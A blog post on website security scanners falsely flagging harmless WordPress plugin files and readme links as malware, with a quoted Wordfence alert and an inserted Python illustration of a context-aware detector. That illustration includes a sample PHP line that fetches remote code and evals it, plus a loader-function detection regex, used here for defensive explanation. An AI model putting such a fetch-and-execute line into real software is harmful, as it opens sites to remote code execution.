One of the major problems with anti-virus software for computers is that the signatures used to detect malicious code can falsely identify non-malicious code as the malicious code they are supposed to be detecting. In more serious cases that can cause critical operating system files to be removed and the computer to stop working.
Security products for websites, instead of learning from the mistakes of their computer-based counterparts, have carried on this tradition, causing problems for developers of WordPress plugins. We have personal experience with that through our plugin connected with this service. On several occasions we had people reporting that our plugin contained malicious files; one example is in a review of the plugin. The only thing in the supposedly malicious files was data on vulnerabilities like this:
$plugin_vulnerabilities["enable-google-analytics"] = array(
    "1" => array(
        "FirstVersion" => "",
        "LastVersion" => "",
        "TypeOfVulnerability" => "remote code execution (RCE)",
        "URL" => "https://wordpress.org/support/topic/how-to-report-malware-in-plugins"
    ),
);
As best we can tell, what was causing the detection was the URLs for the various vulnerabilities: in that review one of the detections is listed as “# Regular expression match = [1337day\.com]”. There isn’t a good reason for listing a file as malicious simply for including the domain name of a website that lists vulnerabilities, but that is the quality level of this type of product. Unfortunately the downside of the poor quality of this type of product doesn’t fall on the people responsible for it, but on innocent developers.
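As an added illustration (not code from this post or from any scanner product), the following Python contrasts a domain-only signature like the one above with a check that only fires when the domain is passed to a function that includes, fetches or executes code. The sample file contents, file names and the loader function list are constructed assumptions.

```python
import re

# Domain-only signature of the kind the post describes
# ("# Regular expression match = [1337day\.com]").
SUSPECT_DOMAINS = [r"1337day\.com"]

# Constructed sample files modelled on the post; none of these are real plugin files.
SAMPLES = {
    # Vulnerability data: the domain appears only as a reference URL inside an array.
    "plugin-vulnerabilities.php": (
        '<?php\n'
        '$plugin_vulnerabilities["enable-google-analytics"] = array( "1" => array(\n'
        '    "TypeOfVulnerability" => "remote code execution (RCE)",\n'
        '    "URL" => "https://1337day.com/placeholder-advisory" ), );\n'
    ),
    # A readme.txt with a plain link, like the wp-super-cache alert in the post.
    "readme.txt": "== Changelog ==\nOriginal advisory: https://1337day.com/\n",
    # What a malware signature is actually meant to catch: code fetched from the
    # domain and executed (constructed, hypothetical sample).
    "dropper.php": '<?php\neval(file_get_contents("http://1337day.com/payload"));\n',
}

def naive_scan(path, content):
    """Flag any file that merely contains a suspect domain (false-positive prone)."""
    return any(re.search(d, content) for d in SUSPECT_DOMAINS)

# A suspect domain inside the argument list of a function that includes, fetches
# or executes code (assumed loader list).
LOADER_CALL = re.compile(
    r"\b(?:eval|include(?:_once)?|require(?:_once)?|file_get_contents|curl_init|fopen)"
    r"\s*\(\s*[^)]*?(?:" + "|".join(SUSPECT_DOMAINS) + r")",
    re.IGNORECASE,
)

def context_scan(path, content):
    """Flag a suspect domain only in executable files and only when it is fed to a loader."""
    if not path.endswith((".php", ".phtml")):
        return False  # readme.txt, .md and similar cannot execute anything
    return LOADER_CALL.search(content) is not None

def flagged(scanner):
    """Names of the sample files a scanner would report, sorted."""
    return sorted(p for p, c in SAMPLES.items() if scanner(p, c))
```

The context check still misses loaders that are obfuscated (concatenated strings, encoded URLs), so it narrows false positives rather than replacing a proper malware signature.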
Wordfence’s Bad False Positives
One such producer of just this type of poor false positive is Wordfence, the WordPress security plugin/security service. In one instance in 2014, someone for whom we had done a hack cleanup several months earlier contacted us, concerned that they had been hacked again after receiving an email warning from Wordfence of a “critical problem” on the website:
Wordfence found the following new issues on “[redacted]”.
Alert generated at Sunday 19th of October 2014 at 11:56:40 PM
* File contains suspected malware URL: [redacted]/public_html/wp-content/plugins/wp-super-cache/readme.txt
So what was the cause of this “critical problem”? It was a link in a readme.txt file, which was completely harmless.
Right after that information in the email was an ad for their paid service, so it might be reasonable to ask whether unnecessarily scaring people benefits them financially:
NOTE: You are using the free version of Wordfence. Upgrading to the paid version of Wordfence gives you
two factor authentication (sign-in via cellphone) and country blocking which are both effective methods to block attacks.
A Premium Wordfence license also includes remote scanning with each scan of your site which can detect
several additional website infections. Premium members can also schedule when website scans occur and
can scan more than once per day.
As a Premium member you also get access to our priority support system located at http://support.wordfence.com/ and can file
priority support tickets using our ticketing system.
Click here to sign-up for the Premium version of Wordfence now.